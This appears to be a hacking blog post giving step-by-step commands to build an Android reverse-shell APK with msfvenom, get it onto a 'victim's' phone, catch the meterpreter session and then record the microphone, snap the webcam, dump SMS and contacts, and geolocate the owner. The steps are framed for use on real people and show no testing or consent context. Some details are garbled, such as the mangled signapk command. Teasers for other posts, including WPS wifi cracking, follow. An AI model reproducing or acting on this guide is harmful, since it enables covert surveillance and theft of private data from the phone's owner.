Metasploit for the Future Hackers (msfvenom) : Hack Any Android Phone

By -

msfvenom is a kali linux hacking tool for android ,is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance known as msfvenom payload.

Hacking With METASPLOIT in Kali Linux is a old tool. Metasploit is enhanced by msfvenom in kali linux. Metasploit is now a outdated tool.

So, let's get started!!


STEPS :

1. Fire Up kali and open command terminal.

2. Set payload and create custom windows executable.
Command:

msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.0.110 LPORT=4444 R > andro.apk
(To know your LHOST, open new terminal and type ifconfig )

Your apk file is being saved in the Home folder.

Note: Don't add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).

3. Transfer/mail this file (here andro.apk) file to the victim's phone and install it.

4. Start the metasploit framework console as follows :
       
Command:

                    msfconsole

5. Now it's time to open and setup multi-handler. Follows the steps :
msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

        Payload Handler is being started........

6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established.

7. Try the following exploit commands :
    - record_mic
    - webcam_snap
    - webcam_stream
    - dump_contacts
    - dump_sms
    - geolocate
************************************************************************
Error fixing(incase you get PARSE ERROR)

Parse error
   To fix this error download signapk - Click here to download

Steps to follow
  1. Open Signapk folder then open cmd.
  2. Copy the andro.apk(the app you made) in Signapk folder.
  3. Type java -" jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk "in cmd(not double quotes).
  4. copy it in your phone and install it.
Hope this works... :)

Will Be Posting Tutorial Video Soon.....

Share the post!!!!!! Enjoy HACKING!!!

Comments

Post a Comment

Popular posts from this blog

Report Suggests Apple iPhone XI to sport Long Distance 3D Camera Calling support.

By -
Image
The next gen camera technology has been in talks for some time now and Sony has been burning night hours in making it ready for mass productions. According to talk between Sony and BloombergQuint, The Sony will be soon be boosting their 3D Camera sensors after getting positive response from the customers and positive response from the market. The Apple Inc. is one of their customers. This new tech may result in huge improvements and a revolution in the smartphone photography. Some rumours also suggest that the Apple is planning to implement augmented reality features to its future Flagships and the future flagships may come with tri-camera setup. And from the rumours one can anticipate that these new camera features will be used to draw potential customer in the year 2019 by Apple Inc.  But the plans may or may not succeed as the most awaited and most anticipated feature the market has been waiting for the year 2019 is the smartphones and flagships with 5G connectivit
Read more

Hack WPA/WPA2 WPS Wifi Hack

By -
Image
When it was known that a WEP network could be hacked by any kid with a laptop and a network connection (using easy peasy tutorials like those on our blog), the security guys did succeed in making a much more robust security measure WPA/WPA2. Now hacking WPA/WPA2 is a very tedious job in most cases. A dictionary attack may take days, and still might not succeed. Also, good dictionaries are huge. An exhaustive bruteforce including all the alphabets (uppercase lowercase) and numbers, may take years, depending on password length. Rainbow tables are known to speed things up, by completing a part of the guessing job beforehand, but the output rainbow table that needs to be downloaded from the net is disastrously large (can be 100s of GBs sometimes). And finally the security folks were at peace. But it was not over yet, as the new WPA technology was not at all easy for the users to configure. With this in mind, a new security measure was introduced to compliment WPA. Wifi Protected Set
Read more

Affordable Galaxy Home Smart Speakers from Samsung Powered by Bixby

By -
Image
Image Credit: Samsung Recently Samsung introduced their Galaxy Home Smart Speakers powered by Bixby Assistant from Samsung and it is yet to hit the market, but rumours about them planning an affordable version of the speakers which will also be powered by their voice assistant Bixby. Although the full specification of the speaker is not yet known it is expected to have less features being the affordable one than the pricier one i.e. the Galaxy Home Smart Speakers. This could most likely be their strategy as the Galaxy Home Speaker may compete with the Apple HomePod which cost somewhere around 349 USD but for Samsung to compete with more affordable speakers available in the market like Google Home and Amazon Echo which are available at less than 200 USD or so they had to take this approach. Even though the launch Is not yet confirmed, for Samsung to be able to compete in this niche they will have to focus on the potential customers who opt for more affordable kind of appro
Read more